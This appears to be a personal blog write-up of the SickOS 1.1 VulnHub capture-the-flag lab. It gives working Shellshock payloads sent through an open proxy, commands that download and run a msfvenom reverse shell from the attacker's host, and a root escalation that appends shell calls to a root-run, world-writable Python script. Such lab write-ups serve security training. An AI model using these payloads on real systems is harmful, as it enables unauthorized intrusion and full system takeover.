Tuesday, December 29, 2015

SickOS 1.1 writeup

Quick writeup about SickOS 1.1 from vulnhub.

As usual, nmap is the first runner:
$ nmap -p- -A -v -T5 $IP

apart port 22/tcp, it's interesting that it runs an open proxy on port 3128.

as a test I configured my browser to use this proxy and browsed to see a funny welcome page:

time to wake up nikto, configured to use the proxy of course:
$ nikto -host -useproxy
our good fellow found a possible way in:

nikto is right:
$ curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://$IP:3128 with:

i expect to be a non-privileged user, so to have a more confident environment i created a meterpreter revshell with msfvenom, downloaded and executed it:

$ CMD="/usr/bin/wget -O /tmp/revshell http://$ME/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128
$ CMD="/bin/chmod 755 /tmp/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128
$ CMD="/tmp/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128
msfconsole shows up a new session as uid 33 (www-data): time to enumerate the system and get root.

/var/www lists a CMS, already seen with nikto because of it's in robots.txt Disallow list, but a .py get my attention first. it's world-writable and world-executable and it says:
print "I Try to connect things very frequently\n"
print "You may want to try my services"

in the hope that "I" means "root", i tried a simple:

$ echo "import os" >> connect.py
$ echo "os.system('touch /tmp/foo')" >> connect.py
and waited a couple of seconds before to ls -al /tmp:

so connect.py is executed by root every a while, good find.

to be faster to execute code i added another line to connect.py:
$ echo "os.system('/tmp/run')" >> /var/www/connect.py
then i created a new meterpreter reverseshell, and downloaded+executed it:

$ echo "#!/bin/bash" > /tmp/run
$ echo "wget -O /tmp/revshell4445" >> /tmp/run
$ echo "chmod 755 /tmp/revshell4445" >> /tmp/run
$ echo "/tmp/revshell4445 &" >> /tmp/run
$ echo "rm -f /tmp/run" >> /tmp/run
$ chmod 755 /tmp/run
after a minute i see a new session on msfconsole:

and the flag is:

thanks to D4rk for letting me play with his vulnerable box.

No comments:

Post a Comment